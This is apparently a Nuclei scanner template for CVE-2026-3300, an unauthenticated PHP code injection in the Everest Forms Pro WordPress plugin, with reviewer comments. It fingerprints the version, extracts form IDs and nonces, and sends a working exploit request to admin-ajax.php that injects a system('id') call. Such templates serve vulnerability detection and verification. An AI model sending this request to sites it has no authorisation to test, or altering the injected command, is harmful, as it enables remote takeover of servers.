# Nuclei template for CVE-2026-3300 (Everest Forms Pro <= 1.9.12).
# Three-step flow (see `flow:` below): (1) fingerprint the plugin version from
# readme.txt, (2) harvest a form id, nonce and field ids from the public REST
# pages listing, (3) submit the form via admin-ajax.php and match on the
# injected command's output. Steps 1 and 2 are `internal: true`, so only
# step 3 produces a finding.
# NOTE(review): the trailing `# digest:` line is presumably a signature over
# the template bytes; any byte change to this file (reflowed whitespace,
# added comments) will no longer match it and the template will need
# re-signing — confirm against the signing tooling in use.
id: CVE-2026-3300

info:
  name: Everest Forms Pro <= 1.9.12 - Unauthenticated RCE via Calculation Formula Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection
    in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter()
    function concatenating user-submitted form field values into a PHP code string without proper escaping
    before passing it to eval(). The sanitize_text_field() function applied to input does not escape single
    quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to
    inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type
    form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code on the server, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of Everest Forms Pro plugin.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/389c0b89-e408-4ad5-9723-a16b745771f0?source=cve
    # NOTE(review): this link points at the free `everest-forms` plugin tree, not
    # the Pro addon named in the advisory — verify it is the intended code reference.
    - https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/class-evf-form-task.php#L584
    - https://everestforms.net/changelog/
    - https://www.wordfence.com/blog/2026/06/attackers-actively-exploiting-critical-vulnerability-in-everest-forms-pro-plugin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-3300
    epss-score: 0.40992
    epss-percentile: 0.98487
    cwe-id: CWE-94
  metadata:
    # Matches the three HTTP requests defined under `http:` below.
    max-request: 3
    verified: true
    product: everest-forms-pro
    vendor: wpeverest
    fofa-query: body="/wp-content/plugins/everest-forms-pro/"
  # `vkev` presumably flags a known-exploited vulnerability; the fourth reference
  # above reports active in-the-wild exploitation.
  tags: cve,cve2026,wordpress,wp-plugin,everest-forms,rce,unauth,vkev

# All three requests must match for the template to fire.
flow: http(1) && http(2) && http(3)

http:
  # Step 1: version fingerprint. `internal: true` on the matcher and extractor
  # keeps this request from producing its own result; `version` feeds the
  # compare_versions() check.
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/everest-forms-pro/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Everest Forms")'
          - 'compare_versions(version, "<= 1.9.12")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        internal: true
        group: 1
        regex:
          - 'Stable tag:\s*([0-9.]+)'

  # Step 2: pull the rendered form markup from the public REST pages listing.
  # The extractors accept either a JSON-escaped quote (\") or a bare quote, since
  # the HTML arrives embedded in JSON strings.
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/pages?per_page=100"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          # NOTE(review): contains() is documented as a two-argument helper;
          # confirm this three-argument form is accepted, otherwise
          # contains_all(body, "evf-container", "data-formid") is the documented
          # helper for "all substrings present".
          - 'contains(body, "evf-container","data-formid")'
        condition: and
        internal: true

    extractors:
      # Form id submitted as everest_forms[id] in step 3.
      - type: regex
        name: form_id
        internal: true
        group: 1
        regex:
          - 'data-formid=(?:\\"|")([0-9]+)'

      # Nonce value and the form-specific nonce field name (_wpnonce<id>),
      # extracted separately because the field name carries the form id.
      - type: regex
        name: nonce
        internal: true
        group: 1
        regex:
          - 'name=(?:\\"|")_wpnonce[0-9]+(?:\\"|")\s+value=(?:\\"|")([a-f0-9]+)'

      - type: regex
        name: nonce_field
        internal: true
        group: 1
        regex:
          - 'name=(?:\\"|")(_wpnonce[0-9]+)(?:\\"|")\s+value='

      # A text field (the string-type field the advisory names as the injection
      # point) and a number field (the calculation target).
      - type: regex
        name: text_field
        internal: true
        group: 1
        regex:
          - 'evf-field-text[^>]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)'

      - type: regex
        name: calc_field
        internal: true
        group: 1
        regex:
          - 'evf-field-number[^>]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)'

  # Step 3: unauthenticated form submission through admin-ajax.php. Both
  # matchers must hit: the `id`-style output in the response body and the
  # plugin's `"success":true` JSON flag.
  # Defensive signal: an unauthenticated POST to admin-ajax.php with
  # action=everest_forms_ajax_form_submission whose form_fields value contains
  # PHP syntax (quote, semicolon, function call) is the request shape to alert
  # or block on until the plugin is updated.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=everest_forms_ajax_form_submission&everest_forms[id]={{form_id}}&everest_forms[author]=1&everest_forms[form_fields][{{text_field}}]=1'%3B+system('id')%3B+echo+'&everest_forms[form_fields][{{calc_field}}]=0&{{nonce_field}}={{nonce}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=[0-9]+\([a-z_-]+\)'

      - type: word
        part: body
        words:
          - '"success":true'

    extractors:
      # Whole-match (group 0) of the uid/gid pair, surfaced in the result.
      - type: regex
        group: 0
        regex:
          - 'uid=[0-9]+\([a-z_-]+\)\s*gid=[0-9]+\([a-z_-]+\)'
# digest: 4a0a00473045022002e890b4d8b04cb01544288ccf7a10b8c9778cac317a234b3a6dc6b410f6cadc022100dbf0305b675a6645001eca0537d37cd958832938ac2b5349cfb146fbabacb46e:922c64590222798bb761d5b6d8e72950